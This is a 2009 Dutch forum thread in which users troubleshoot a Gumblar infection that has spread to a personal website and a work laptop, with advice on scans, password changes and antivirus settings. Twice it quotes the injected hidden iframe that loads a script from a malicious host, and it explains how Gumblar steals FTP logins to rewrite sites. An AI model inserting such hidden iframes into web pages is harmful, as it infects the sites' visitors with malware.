abonnement Unibet Coolblue Bitvavo
  dinsdag 11 augustus 2009 @ 12:03:47 #26
79166 Qwea
#teampindakaas #viesdik
pi_71785601
quote:
Op dinsdag 11 augustus 2009 12:02 schreef St4ck3r het volgende:
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>

Ze wisselen wel mooi af met linkjes
ja hier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.

Ik vraag me af, hoe dit concreet opgelost gaat worden.

Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...

Ga je dat ooit stoppen?
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71785804
quote:
Op dinsdag 11 augustus 2009 @ 12:01 schreef Qwea het volgende:

[..]

Heeft hij die laptop ook op het bedrijsnetwerk aangesloten? Dan mogen ze wel snel actie ondernemen
Dat heb ik al gezegd ja.
quote:
Op dinsdag 11 augustus 2009 @ 12:02 schreef St4ck3r het volgende:
<iframe data-src="http://c6h.at:8080/ts/in.cgi?pepsi138" style="visibility:hidden;" width=125 height=125 style="visibility: hidden"></iframe>

Ze wisselen wel mooi af met linkjes
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71785829
Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.

Stap 1:

Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis

Systeem Scan
  • Open HijackThis.
  • Klik op “Do a systemscan and save a logefile”
  • Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log”
  • Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply.
  • Na het kopieren van de log het programa afsluiten.

    Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
  • █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 12:11:47 #29
    79166 Qwea
    #teampindakaas #viesdik
    pi_71785847
    quote:
    Op dinsdag 11 augustus 2009 12:10 schreef MissBliss het volgende:

    [..]

    Dat heb ik al gezegd ja.
    [..]

    Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was
    Bij MM op het werk issie ook Vandaar dat MM hem op zijn site ook had. Complete chaos
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786030
    quote:
    Op dinsdag 11 augustus 2009 @ 12:11 schreef CantFazeMe het volgende:
    Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.

    Stap 1:

    Download Trend Micro HijackThis
    http://www.trendsecure.co(...)ity_tools/hijackthis

    Systeem Scan
  • Open HijackThis.
  • Klik op “Do a systemscan and save a logefile”
  • Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log”
  • Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply.
  • Na het kopieren van de log het programa afsluiten.

    Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
  • Het is mn eigen computer ja. Ik durf dit niet

    Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

    Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:20:29 #31
    262 Re
    Kiss & Swallow
    pi_71786082
    quote:
    Op dinsdag 11 augustus 2009 12:03 schreef Qwea het volgende:

    [..]

    ja hier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.

    Ik vraag me af, hoe dit concreet opgelost gaat worden.

    Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...

    Ga je dat ooit stoppen?
    call gelogd bij helpdesk, responsetijd 3 uur , dus ik merk het wel
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 12:23:09 #32
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786154
    quote:
    Op dinsdag 11 augustus 2009 12:20 schreef Re het volgende:

    [..]

    call gelogd bij helpdesk, responsetijd 3 uur , dus ik merk het wel
    3u? dat zijn ze schromelijk te laat ws

    Ik zou dan ook gelijk aangeven dat ze de website's na moeten lopen die gehost worden bij je werk. En alle andere comps in het netwerk
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 12:23:39 #33
    22273 Dizer
    Save the beard!
    pi_71786168
    quote:
    Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

    [..]

    Het is mn eigen computer ja. Ik durf dit niet

    Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

    Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
    Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
    Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

    Weer een reden om over te stappen op Apple
    Friends don't let friends remain beardless...
      dinsdag 11 augustus 2009 @ 12:24:33 #34
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786182
    quote:
    Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

    [..]

    Het is mn eigen computer ja. Ik durf dit niet

    Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

    Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
    Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.

    Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786197
    quote:
    Op dinsdag 11 augustus 2009 @ 12:23 schreef Dizer het volgende:

    [..]

    Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
    Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

    Weer een reden om over te stappen op Apple


    Re had het toevallig wel van de week over: zullen we een nieuwe computer kopen? Dus wie weet
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71786243
    quote:
    Op dinsdag 11 augustus 2009 @ 12:24 schreef Qwea het volgende:

    [..]

    Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.

    Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
    Nee, dan blijf ik er vanaf!

    Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:30:54 #37
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786364
    quote:
    Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:

    [..]

    Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
    Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

    Weer een reden om over te stappen op Apple
    quote:
    Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:

    [..]

    Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
    Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

    Weer een reden om over te stappen op Apple
    Flash en adobe reader.
    quote:
    Wat doet Gumblar?
    Het doel van de malware is om zoveel mogelijk computers te besmetten en gevoelige informatie van de deze computers te stelen. Gumblar gaat na infectie van een computer op zoek naar zogenaamde FTP-inloggegevens. FTP wordt vaak gebruikt om websites te updaten. Deze gegevens worden door Gumblar gebruikt om toegang te krijgen tot de content van allerlei (goed bedoelde) websites. Webpagina's van deze sites worden vervolgens aangepast. Bezoek je zo’n site, dan krijg je deze nieuwe malware aangeboden. Dit gebeurt opnieuw via de kwetsbare plekken in Adobe PDF Reader en Adobe Flash wanneer je zo'n website bezoekt. Op deze manier worden computers geïnfecteerd met de Gumblar code.

    Ook worden er aanpassingen gedaan in Internet Explorer, de webbrowser. Deze aanpassingen zorgen ervoor dat zoekresultaten in Google worden gemanipuleerd en verwijzen naar sites waarmee malware verspreid wordt.

    Naast het manipuleren van Google-zoekresultaten en het stelen van FTP-inloggegevens zal een besmette computer:
    quote:
    Affected Platforms:

    The malware affecting PCs targets prevalent Microsoft platforms:

    * Microsoft Windows 2000
    * Microsoft Windows XP
    * Microsoft Windows Server 2003
    Ik vraag me af waarom vista niet.

    overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten

    Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 12:31:43 #38
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786381
    quote:
    Op dinsdag 11 augustus 2009 12:26 schreef MissBliss het volgende:

    [..]

    Nee, dan blijf ik er vanaf!

    Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
    Dat ding kan zich werkelijk overal hebben ingenesteld.

    Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786425
    Ok, ook niet meer googlen in IE dus

    Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71786454
    quote:
    Op dinsdag 11 augustus 2009 @ 12:31 schreef Qwea het volgende:

    [..]

    Dat ding kan zich werkelijk overal hebben ingenesteld.

    Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
    Nee, dat dan weer niet.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:34:42 #41
    105263 Litso
    Interlectueel.
    pi_71786479
    Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
    "Dat is echt ontzettend zielig" ©
      dinsdag 11 augustus 2009 @ 12:34:46 #42
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786480
    quote:
    Op dinsdag 11 augustus 2009 12:32 schreef MissBliss het volgende:
    Ok, ook niet meer googlen in IE dus

    Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
    Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786505
    quote:
    Op dinsdag 11 augustus 2009 @ 12:34 schreef Litso het volgende:
    Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
    Oh sorry
    Ik zal de link uit de OP halen!
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:35:47 #44
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786513
    quote:
    Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
    Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
    Download ff avast. Ik snap het niet he...

    Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan terwijl hier gelijk mijn pc ging lopen schreeuwen " BAD IFRAME! VIRUS! TROJAN!"
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786515
    quote:
    Op dinsdag 11 augustus 2009 @ 12:34 schreef Qwea het volgende:

    [..]

    Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet
    Ok.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:36:40 #46
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786529
    MB? Is het handig om de TT te wijzigen? Je weet nu immers wat het probleem precies is.

    Ik zeg maar wat hoor
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786547
    quote:
    Op dinsdag 11 augustus 2009 @ 12:36 schreef Qwea het volgende:
    MB? Is het handig om de TT te wijzigen? Je weet nu immers wat het probleem precies is.

    Ik zeg maar wat hoor
    Ja, goed idee!
    Zal ik het zelf doen?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:37:19 #48
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786549
    quote:
    Op dinsdag 11 augustus 2009 12:35 schreef MissBliss het volgende:

    [..]

    Ok.
    Ooh, en zet je internet beveiliging van avast (iets met surfen ofzo in de instellingen) op hoog I did it
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 12:37:39 #49
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786555
    quote:
    Op dinsdag 11 augustus 2009 12:37 schreef MissBliss het volgende:

    [..]

    Ja, goed idee!
    Zal ik het zelf doen?
    je bent toch niet voor jan snot mod
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786589
    Gedaan en gedaan
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    abonnement Unibet Coolblue Bitvavo
    Forum Opties
    Forumhop:
    Hop naar:
    (afkorting, bv 'KLB')